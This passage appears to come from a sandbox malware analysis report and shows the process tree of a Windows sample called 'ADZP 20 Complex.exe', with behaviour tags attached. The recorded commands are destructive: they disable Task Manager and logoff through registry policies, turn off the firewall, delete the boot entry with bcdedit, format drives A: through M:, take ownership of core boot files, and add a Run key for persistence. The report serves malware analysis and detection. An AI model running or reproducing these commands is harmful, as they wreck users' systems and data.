        notepad
        7⤵
        
        PID:7100
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:1016
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:5808
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:7212
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:1592
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:8204
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:8256
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:8304
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        
        PID:8364
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:10008
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        
        PID:12084
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:13268
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:10228
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:1772
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:2312
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:1748
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:452
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:2352
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:3400
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:3836
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:3844
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:4292
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4356
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /delete {current}
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:4148
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:3808
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:4268
    - - C:\Windows\system32\msg.exe
        
        msg * Has sido hackeado!
        5⤵
        
        PID:3088
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\drivers" /r
        5⤵
        
        PID:4136
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\drivers" /reset /t /c /q
        5⤵
        
        PID:3964
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\drivers\*.*"
        5⤵
        Views/modifies file attributes
        
        PID:4968
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:4736
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:3156
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:4732
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:4340
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:2712
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:4604
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:488
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6C79.tmp\6C7A.tmp\6C7B.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:9236
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:10388
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:10624
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:11280
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:11732
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:10228
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        
        PID:12932
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:13192
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Modifies file permissions
        
        PID:12760
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:11276
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:2080
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:13612
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:13688
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:4308
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5080
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:4768
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:4036
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:4164
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6C89.tmp\6C8A.tmp\6C8B.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:9260
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:10464
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:10580
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:11308
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:11748
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:10584
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:12992
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:13220
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:10228
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:7236
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:13012
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:13620
        
        C:\Windows\SysWOW64\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:13680
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:4588
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5140
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:5156
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:5196
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:5292
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7993.tmp\7994.tmp\7995.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:10236
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:10380
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:10620
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:11956
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:10364
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:13016
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6612
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:2080
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        
        PID:9920
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:13496
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:13636
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:5324
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5356
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:5364
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:5376
    - - C:\Windows\system32\format.com
        
        format /y /q A:
        5⤵
        
        PID:5448
    - - C:\Windows\system32\format.com
        
        format /y /q B:
        5⤵
        
        PID:5280
    - - C:\Windows\system32\format.com
        
        format /y /q D:
        5⤵
        
        PID:6252
    - - C:\Windows\system32\format.com
        
        format /y /q E:
        5⤵
        
        PID:6648
    - - C:\Windows\system32\format.com
        
        format /y /q F:
        5⤵
        
        PID:6796
    - - C:\Windows\system32\format.com
        
        format /y /q G:
        5⤵
        
        PID:7080
    - - C:\Windows\system32\format.com
        
        format /y /q H:
        5⤵
        
        PID:5252
    - - C:\Windows\system32\format.com
        
        format /y /q I:
        5⤵
        
        PID:5608
    - - C:\Windows\system32\format.com
        
        format /y /q J:
        5⤵
        
        PID:7684
    - - C:\Windows\system32\format.com
        
        format /y /q K:
        5⤵
        
        PID:9068
    - - C:\Windows\system32\format.com
        
        format /y /q L:
        5⤵
        
        PID:10912
    - - C:\Windows\system32\format.com
        
        format /y /q M:
        5⤵
        
        PID:11468
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\VBICodec.ax"
        5⤵
        
        PID:12476
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\VBICodec.ax" /reset /c /q
        5⤵
        Modifies file permissions
        
        PID:13544
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:2388
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:2392
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:1644
- - C:\Windows\system32\mspaint.exe
    mspaint
    3⤵
    - Drops file in Windows directory
    - Suspicious use of SetWindowsHookEx
    PID:2796
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2884
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BC4D.tmp\BC4E.tmp\BC4F.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
      4⤵
      Drops startup file
      PID:1808
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:1488
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1984
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        5⤵
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:1256
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        5⤵
        Modifies file permissions
        
        PID:2708
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        5⤵
        Views/modifies file attributes
        
        PID:2928
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        5⤵
        Possible privilege escalation attempt
        Suspicious use of AdjustPrivilegeToken
        
        PID:1436
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        
        PID:2512
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        5⤵
        Views/modifies file attributes
        
        PID:624
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2716
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        5⤵
        
        PID:2712
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        5⤵
        Views/modifies file attributes
        
        PID:2184
    - - C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        5⤵
        
        PID:2156
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        5⤵
        
        PID:2940
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        5⤵
        
        PID:1072
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:2804
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        5⤵
        Adds Run key to start application
        
        PID:916
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        Drops autorun.inf file
        Views/modifies file attributes
        
        PID:1816
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:2952
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:1588
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:1660
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:2384
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:1256
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:3076
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:3112
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:3128
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:3144
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:3172
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3196
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E791.tmp\E792.tmp\E793.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:4448
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:3152
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Modifies file permissions
        
        PID:7056
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:3088
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4892
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:3156
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:3088
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        
        PID:4772
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:3692
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Modifies file permissions
        
        PID:4688
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:4760
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:4516
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:4468
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:4040
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:6396
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:6136
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:6492
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        
        PID:7020
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7192
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7660
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7744
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7848
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7936
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7984
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8028
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8076
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8148
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6928
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:2856
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:6488
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:6140
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:7376
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:8216
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:8268
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:8312
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:8384
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:8420
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:8468
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:8496
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:8528
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:8576
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:8624
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:8648
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:8684
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        
        PID:10472
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:11712
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        
        PID:2756
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:6284
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:3224
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:3244
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:3284
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:3308
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3332
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E9E2.tmp\E9E3.tmp\E9E4.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:1692
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:3040
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Possible privilege escalation attempt
        
        PID:7164
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Modifies file permissions
        
        PID:4716
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:4692
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:4516
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:4768
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        
        PID:4140
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:4084
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        
        PID:3088
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:4036
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:3440
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:5176
        
        C:\Windows\SysWOW64\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:5228
        
        C:\Windows\SysWOW64\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:6636
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:6632
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:5440
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:7372
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8156
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8756
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8820
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8888
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8936
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8996
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9084
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9152
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9212
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8124
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:6584
        
        C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:3160
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        7⤵
        
        PID:8544
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:9296
        
        C:\Windows\SysWOW64\mspaint.exe
        
        mspaint
        7⤵
        
        PID:9348
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
